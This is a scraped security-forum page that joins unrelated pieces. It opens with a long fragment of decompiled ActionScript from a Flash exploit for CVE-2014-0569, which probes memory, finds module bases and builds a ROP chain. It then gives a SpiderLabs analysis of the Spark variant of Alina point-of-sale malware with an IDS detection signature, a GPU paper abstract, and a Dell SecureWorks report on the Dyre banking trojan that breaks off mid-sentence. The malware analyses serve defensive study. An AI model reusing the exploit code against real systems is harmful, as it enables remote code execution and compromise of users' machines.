4)) == 30)) && ((this.intog((_loc6_ + 8)) == 1)))) && ((this.intog((_loc6_ + 20)) == 1)))){ this.bonom = (this.intog((_loc6_ + 12)) & 0xFFFFFFF8); this.gleeuo = this.intog(this.bonom); _loc7_ = (this.intog((_loc6_ + 16)) & 0xFFFFFFF8); if (this.mort5 < 114){ this.wombu3 = this.intog((_loc7_ + 56)); } else { _loc7_ = this.intog((_loc7_ + 64)); this.wombu3 = this.intog((_loc7_ + 8)); }; } else { return (7); }; }; } else { if (((!(this.rugau8)) && ((this.fray6u[_loc2_] == this.crux1)))){ this.rugau8 = this.fray6u[(_loc2_ - 1)]; }; }; if (((this.hugh1) && (this.rugau8))){ return (0); }; _loc1_++; }; if (((!(this.hugh1)) && (!(this.rugau8)))){ return (1); }; if (!(this.hugh1)){ return (2); }; if (!(this.rugau8)){ return (3); }; return (4); } public function midin():Boolean{ var _loc1_:uint = (this.gleeuo & 0xFFFF0000); while ((this.intog(_loc1_) & 0xFFFF) != 23117) { _loc1_ = (_loc1_ - 65536); }; this.talis0 = _loc1_; if (this.talis0){ this.dawnod = (this.talis0 + this.intog((this.talis0 + 60))); if ((this.intog(this.dawnod) & 0xFFFF) == 17744){ return (true); }; }; return (false); } public function weilwk():Boolean{ var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc8_:uint; var _loc1_:uint = this.intog((this.dawnod + 28)); var _loc2_:uint = this.intog((this.dawnod + 44)); if (((_loc1_) && (_loc2_))){ _loc2_ = (_loc2_ + this.talis0); _loc3_ = this.intog(_loc2_); _loc4_ = 4; while (_loc4_ < _loc1_) { _loc5_ = this.intog((_loc2_ + _loc4_)); _loc6_ = 0; while (_loc6_ < 4) { _loc7_ = this.fullk(_loc3_, _loc5_, _loc6_); _loc8_ = (_loc7_ & 0xFFFF); if (((!(this.fund2)) && ((_loc8_ == 50068)))){ this.fund2 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.jump4)) && ((_loc8_ == 50009)))){ this.jump4 = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.dipseu)) && ((_loc8_ == 49992)))){ this.dipseu = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.modsj)) && ((_loc8_ == 50000)))){ this.modsj = (((_loc2_ + _loc4_) - 4) + _loc6_); }; if (((!(this.buttkk)) && ((_loc7_ == 3277654153)))){ this.buttkk = (((_loc2_ + _loc4_) - 4) + _loc6_); }; _loc6_++; }; _loc3_ = _loc5_; if (((((((((this.fund2) && (this.jump4))) && (this.dipseu))) && (this.buttkk))) && (this.modsj))){ return (true); }; _loc4_ = (_loc4_ + 4); }; }; return (false); } public function modo55():uint{ var _loc2_:uint; var _loc3_:uint; var _loc4_:uint; var _loc5_:uint; var _loc6_:uint; var _loc7_:uint; var _loc1_:uint = (this.talis0 + this.intog((this.dawnod + 128))); while (true) { _loc2_ = this.intog(_loc1_); if (_loc2_ == 0){ break; }; _loc3_ = (this.talis0 + this.intog((_loc1_ + 12))); if (((((this.intog(_loc3_) & 1314014539) == 1314014539)) && (((this.intog((_loc3_ + 4)) & 842222661) == 842222661)))){ _loc4_ = 0; _loc2_ = (_loc2_ + this.talis0); while (true) { _loc5_ = this.intog(_loc2_); if (_loc5_ == 0){ break; }; _loc6_ = ((this.talis0 + _loc5_) + 2); if ((((((this.intog(_loc6_) == 1953655126)) && ((this.intog((_loc6_ + 4)) == 1097621877)))) && ((this.intog((_loc6_ + 8)) == 1668246636)))){ _loc7_ = (this.talis0 + this.intog((_loc1_ + 16))); this.sobsft = this.intog((_loc7_ + (_loc4_ * 4))); return ((((this.sobsft == 0)) ? 4 : 0)); }; _loc2_ = (_loc2_ + 4); _loc4_++; }; return (3); }; _loc1_ = (_loc1_ + 20); }; return (2); } private function gadsi():void{ this.pokeg.position = 0; var _loc1_:uint; while (_loc1_ < 27) { this.pokeg.writeUnsignedInt((this.jump4 + 1)); _loc1_++; }; this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.fund2); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.slotl); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.wombu3 + 1208)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(276335968); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3242323591); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3271837833); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(833423561); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272099977); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.modsj); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(4134906824); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(3272362121); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(64); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0x1000); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(0); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt((this.jump4 + 1)); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.dipseu); this.pokeg.writeUnsignedInt(this.jump4); this.pokeg.writeUnsignedInt(this.sobsft); this.pokeg.writeUnsignedInt(this.buttkk); this.pokeg.writeUnsignedInt(0x41414141); this.pokeg.writeUnsignedInt(this.fund2); } private function kahncl():void{ this.sacs1y(this.bonom, this.wombu3); new Number(this.vola1.toString()); } } }//package [/LIST] Sursa: Exploit.SWF.CVE-2014-0569 Decoded Code - Pastebin.com

Alina POS malware "sparks" off a new variant Alina is a well-documented family of malware used to scrape Credit Card (CC) data from Point of Sale (POS) software. We published a series of in-depth write-ups on the capabilities Alina possesses as well as the progression of the versions. Xylitol has a nice write-up on the Command and Control (C&C) aspects of Alina. In this blog post I’d like to discuss a variant that first cropped up in late 2013 and has been seen in the wild as recent as a month ago. Some anti-virus companies have identified similar samples as JackPOS, but there are several interesting behavior differences that haven’t been posted about in any other write-ups. It is clear that Alina, JackPOS, and this variant all bear close resemblances to each other, but there are behavioral differences that distinguish this version from the others which I have not seen detailed elsewhere. For the purposes of this write-up I will be referring to this variant as Spark. AutoIt Staged Loader The first and most interesting difference between Alina and Spark is that several of the samples have been found embedded in a compiled AutoIt script, which then loads the malware into memory. Both Security Affairs and Security Intelligence posted about a similar type of AutoIt compiled script being used as a loader with a JackPOS binary instead of Spark here and here, but did not provide many details. We will take a closer look at how the loader works. AutoIt "is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting". This AutoIt script contains functions to allocate space in memory, map a binary into that memory, fix the relocations and Import Address Table, and execute the binary. A malicious binary is concatenated into a variable 4,000 bytes at a time and the script's functions are used to load and execute it. The script is converted into a windows executable by running the utility Aut2Exe, which produces a new binary with the malware inside it. Figure 1: Compiling an AutoIt Script Converting a script into an executable is a normal and useful part of AutoIt’s functionality. I used a third party utility called Exe2Aut to recover the original script and retrieve the binary. Figure 2: Decompiling an AutoIt Script The use of AutoIt as a loader is an interesting tactic. We typically see malware authors writing a script to execute another binary on the system or perform some function needed to accomplish the dastardly deed the author set out to do. This script is then compiled using Aut2exe for AutoIt, py2exe for python, or perl2exe for perl. These programs include their respective interpreters in the compiled binary for executing the script and are generally considered to be unsophisticated malware. In this case, however, the script has a binary in a variable that is loaded into dynamic memory and fixes up all the addresses required for execution. This is a much more advanced technique and is reusable with different embedded binaries. Like all such loaders, the binary is initially obfuscated artifacts such as strings and import tables from the malicious binary. Startup Previous versions of Alina picked a name from a list of legitimate sounding executable names and copied itself into the oh-so-common %APPDATA% folder under the chosen name. Instead, Spark creates a sub-folder in (surprise) %APPDATA% called “Install” and stores its malicious goodies in there. These malicious goodies include copying the original executable to %APPDATA%/Install/hkcmd.exe and writing a file called ntfs.dat. Spark will always copy itself as hkcmd.exe as opposed to previous Alina versions that selected from a list of varying names. Figure 3: Spark Install Directory At startup, the malware builds the path to %APPDATA%/Install/ntfs.dat and checks to see if the file exists. If the file does not exist, it uses the systems volume serial id and overwrites the first 6 digits with random upper and/or lower case characters. The result of this operation is written to ntfs.dat and is used as the unique ID for the bot. Here is an example: Volume ID => “602C0256” Random chars => “mRtyfo” Unique ID => “mRtyfo56” Figure 4: Random Character Generation This differs from earlier variants, which just used the volume serial id to identify the bot. If the ntfs.dat does exist, the identifier is read into memory. This unique identifier is included in the POST message for all communication with the C&C server. Like all the other versions of Alina, Spark also adds itself to the commonly used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hkcmd key in order to maintain persistence through reboot. Spark uses a named pipe to synchronize moving the malware from its original execution folder to the %APPDATA%/Install directory. The pipe name is generated as \\.\pipe\spark<uniqueID> where <uniqueID> is the same as what is generated above. Using our previous example the pipe name would be \\.pipe\sparkmRtyfo56. Black List Alina includes a black list of processes that are not scraped for CC data. Spark takes the same black list as before and adds additional applications to the list: Figure 5: Black List Differences Since the author is looking for CC data, the choice to add additional processes is an easy one since these applications are highly unlikely to contain the data they are seeking. The majority of the additions are system and common processes. Spark Execution Flow Here is a general picture overview of Spark’s execution flow: Figure 6: Spark Execution Flow Communication The final two differences in this variant have to do with communication to the C&C server. Where previous versions used “Alina vx.x” as the User-Agent, Spark now uses something that is supposed to look legitimate. Figure 7: Spark POST Example As you can see, in their attempts to look legitimate, the author still includes the bot version but forgets to include the closing parenthesis. Here is an IDS signature that has been used to detect Spark. alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN JackPOS Checkin"; flow:established,to_server; content:"POST"; http_method; content:".php"; http_uri; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 7.0|3b| Windows NT 5.1|3b| InfoPath.1 Spark v1.1|0d 0a|"; http_header; fast_pattern:66,20; content:!"Referer|3a|"; http_header; pcre:"/\.php$/U"; reference:md5,3959fb5b5909d9c6fb9c9a408d35f67a; reference:url,trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-ram-scraper-malware.pdf; classtype: slr-et; sid:4004777; rev:1;) This signature refers to the sample as JackPOS, but I think this sample falls somewhere in the spectrum of malware between Alina and JackPOS. As you can see the Spark name has come up several times, both in the POST communication and the named pipe used by the malware. The usage of a version number suggests that the malware author had intentions to produce additional versions. The POST data communication with the C&C server retains the same structure as Alina from v5.2 on, however, Spark chose to reverse the order of the XOR scheme used. Figure 8: XOR'd POST Data To recover the clear text message, bytes 18 through 35 (red) are used as a running XOR key for bytes 76 (green) to the end of the data and then the entire message is XOR’d with 0xAA. This will decrypt the entire message. The yellow section (including the red bytes) contains the header information, while the green is the dynamic data. Earlier variants would first XOR the entire message with 0xAA and then grab bytes 18-35 to decode bytes from 76 to the end. A minor change, but sufficient in that it breaks any tools made to decode any prior communications. I’ve written a ruby script that decodes and parses the traffic and can be found at spark.rb. JackPOS Spark and JackPOS have several similar techniques that relate them. The use of the AutoIt compiled script as a loader is a technique that we have not seen very much and its use with both JackPOS and Spark is a very interesting link. Both use similar blacklist approaches as well as custom functions for finding CC data. However, JackPOS almost exclusively attempts to masquerade as java or a java utility. It also either copies itself directly into the %APPDATA% directory or into a java based sub-directory inside %APPDATA%. JackPOS uses the MAC address as a bot ID and base64 encodes the CC data found on the system in order to obfuscate the exfiltration. In case you missed the link above, here is SpiderLabs' detailed write-up on JackPOS. It seems fairly clear that these are two different variants. So while these two samples appear to be related, Spark bears a much stronger resemblance to Alina than JackPOS. Conclusion There have been rumors and conjecture about Alina source code being sold off as well as JackPOS being a successor to the Alina code base. While I don’t have a pony in the race, the Spark variant shows that someone has been updating the Alina source code recently. The Spark string that shows up in both the named pipe and the POST communication shows an obvious distinction from previous Alina versions. The use of AutoIt as a loader for both Spark and JackPOS variants indicate that it could have potentially been a version between the transition from Alina to JackPOS. I believe it was Shakespeare who said, “Malware by any other name will still steal your credit card data”, or something to that affect. Regardless of what you call these variants, the important part is to understand the details of this threat and how to keep your data secure. Posted by Eric Merritt on 18 December 2014 at 09:00 Sursa: Alina POS malware "sparks" off a new variant - SpiderLabs Anterior

How GPUs Work David Luebke, NVIDIA Research Greg Humphreys, University of Virginia In the early 1990s, ubiquitous interactive 3D graphics was still the stuff of science fiction. By the end of the decade, nearly every new computer contained a graphics processing unit (GPU) dedicated to providing a high-performance, visually rich, interactive 3D experience. This dramatic shift was the inevitable consequence of consumer demand for videogames, advances in manufacturing technology, and the exploitation of the inherent parallelism in the feed-forward graphics pipeline. Today, the raw computational power of a GPU dwarfs that of the most powerful CPU, and the gap is steadily widening. Download: http://www.cs.virginia.edu/~gfx/papers/pdfs/59_HowThingsWork.pdf

Dyre Banking Trojan Author: Brett Stone-Gross and Pallav Khandhar, Dell SecureWorks Counter Threat Unit™ Threat Intelligence Date: 17 December 2014 URL: Dyre Banking Trojan | Dell SecureWorks Summary Threat actors regularly develop new Trojan horse malware to fuel their operations and to ensure the longevity of their botnets. After the takedowns of the Gameover Zeus and Shylock botnets, researchers predicted that a new breed of banking malware would fill the void. In early June 2014, the Dell SecureWorks Counter Threat Unit (CTU) research team discovered the Dyre banking trojan, which was being distributed by Cutwail botnet spam emails that included links to either Dropbox or Cubby file storage services. The threat actors later shifted to distribution via the Upatre downloader trojan. Dyre is also known as Dyreza, Dyzap, and Dyranges by the antivirus industry. Capabilities Dyre harvests credentials, primarily targeting online banking websites to perform Automated Clearing House (ACH) and wire fraud. The malware includes a modular architecture, man-in-the-browser functionality, and a backconnect server that allows threat actors to connect to a bank website through the victim's computer. The man-in-the-browser functionality is based on a unique combination of redirects to fake websites controlled by the threat actor ("web fakes") and a dynamic web inject system that allows the threat actors to manipulate a financial institution's website content. Similar to other banking trojans, Dyre hooks into the most popular web browsers to intercept traffic from a victim's system, stealing information and manipulating website content before it is rendered by the browser. Early Dyre versions of were relatively primitive, sending command and control (C2) communications and stolen data via unencrypted HTTP. Recent iterations of Dyre use SSL to encrypt all C2 communications, as well as a custom encryption algorithm. Dyre also uses RSA cryptography to digitally sign configuration files and malware plugins to prevent tampering. Malware distribution Each Dyre binary has an ID value that allows the malware operators to identify the campaign associated with each compromise. These campaigns are often localized to target specific geographic regions. Since Dyre's introduction, the CTU research team has identified 21 unique Dyre campaigns (see Figure 1). As of this publication, Dyre has targeted more than 242 financial institutions. Figure 1. Distribution of active Dyre campaigns observed by CTU researchers as of this publication. (Source: Dell SecureWorks) Malware distribution vector Dyre is downloaded and installed on compromised systems by the Upatre downloader trojan, which is distributed through spam emails sent by the Cutwail botnet and at least two other spam botnets. The emails contain Upatre as an embedded malware executable in a ZIP attachment (see Figure 2) or as a malicious URL. In both instances, user interaction is required to compromise the targeted system. Dyre campaigns use different lures, such as impersonating FedEx invoices, electronic faxes, and payroll or financial documents. Figure 2. Spam email lure samples dropping Dyre via Upatre downloader as an attachment. (Source: Dell SecureWorks) Architecture The Dyre malware is packed and obfuscated in multiple layers, and it is divided into two modules: the dropper and the main DLL module. The DLL module is stored in two distinct resources named payload32 and payload64, which Dyre activates on 32-bit or 64-bit Windows platforms, respectively. The malware drops a slightly modified copy of itself, using a random filename like "tlBTyLNuJkruXja.exe," in the C:\Windows folder (see Figure 3). When Dyre launches this file, malicious code is injected into svchost.exe. Figure 3. Default location for dropped Dyre files. (Source: Dell SecureWorks) For persistence, Dyre registers as a system service under "Google Update Service" by adding an HKLM\SYSTEM\ControlSet001\Services\googleupdate registry key (see Figure 4). Figure 4. Dyre's persistence mechanism. (Source: Dell SecureWorks) The malware hides its base configuration file, RSA key, and other important data within the resource section of the Dyre DLL (see Figure 5). Figure 5. Dyre resource section containing important data. (Source: Dell SecureWorks) Dyre beacons to the hard-coded IP addresses listed in the base configuration file. The first request registers a bot on the C2 server. The malware sends the compromised system's operating system information to the C2 server and continues beaconing requests. Dyre's web inject engine uses a slightly different approach than other banking trojans. The injected process hooks code into Mozilla Firefox, Google Chrome, and Microsoft Internet Explorer, intercepting victims' credentials when they log into a bank account or other financial service. For each web browser, Dyre hooks different functions within the loaded DLLs: Firefox: PR_Read and PR_Write functions within nspr4.dll Chrome: ssl_read and ssl_write functions within chrome.dll Internet Explorer: functions within wininet.dll When a victim on a compromised system visits one of the targeted banking websites and enters login credentials, Dyre intercepts the data and sends a POST request to the threat actor's drop server. The request includes cookies and browser information. The malware can also manipulate banking website content dynamically, which can be used to circumvent two-factor authentication schemes. Command and control traffic Dyre contacts Google to check network connectivity and then submits a Session Traversal Utilities for NAT (STUN) binding request (see Figure 6). STUN allows a system located behind a network address translator (NAT) to discover a public IP address. Figure 6. Dyre's network connectivity check and STUN requests. (Source: Dell SecureWorks) The STUN servers listed in Table 1 are hard-coded in the Dyre binary. [TABLE=class: tabularr] [TR] [TD]stun1.voiceeclipse.net[/TD] [TD]stun.callwithus.com[/TD] [TD]stun.sipgate.net[/TD] [/TR] [TR] [TD]stun.ekiga.net[/TD] [TD]stun.ideasip.com[/TD] [TD]stun.internetcalls.com[/TD] [/TR] [TR] [TD]stun.noc.ams-ix.net[/TD] [TD]stun.phonepower.com[/TD] [TD]stun.voip.aebc.com[/TD] [/TR] [TR] [TD]stun.voipbuster.com[/TD] [TD]stun.voxgratia.org[/TD] [TD]stun.ipshka.com[/TD] [/TR] [TR] [TD]stun.faktortel.com.au[/TD] [TD]stun.iptel.org[/TD] [TD]stun.voipstunt.com[/TD] [/TR] [TR] [TD]stunserver.org[/TD] [TD]s1.taraba.net[/TD] [TD]s2.taraba.net[/TD] [/TR] [TR] [TD]stun.l.google.com:19302[/TD] [TD]stun1.l.google.com:19302[/TD] [TD]stun2.l.google.com:19302[/TD] [/TR] [TR] [TD]stun3.l.google.com:19302[/TD] [TD]stun4.l.google.com:19302[/TD] [TD]stun.schlund.de[/TD] [/TR] [TR] [TD]stun.rixtelecom.se[/TD] [TD]stun.voiparound.com[/TD] [TD]numb.viagenie.ca[/TD] [/TR] [TR] [TD]stun.stunprotocol.org[/TD] [TD]stun.2talk.co.nz[/TD] [TD][/TD] [/TR] [/TABLE] Table 1. Hard-coded STUN servers. To hide its backend infrastructure, Dyre deploys a set of proxy servers that act as C2 servers. As shown in Figure 7, these servers are primarily located in North America and Europe. The threat actors have also implemented additional methods to maintain control of the botnet. Figure 7. Geographic distribution of Dyre C2 servers. (Source: Dell SecureWorks) Dyre uses SSL to communicate with its 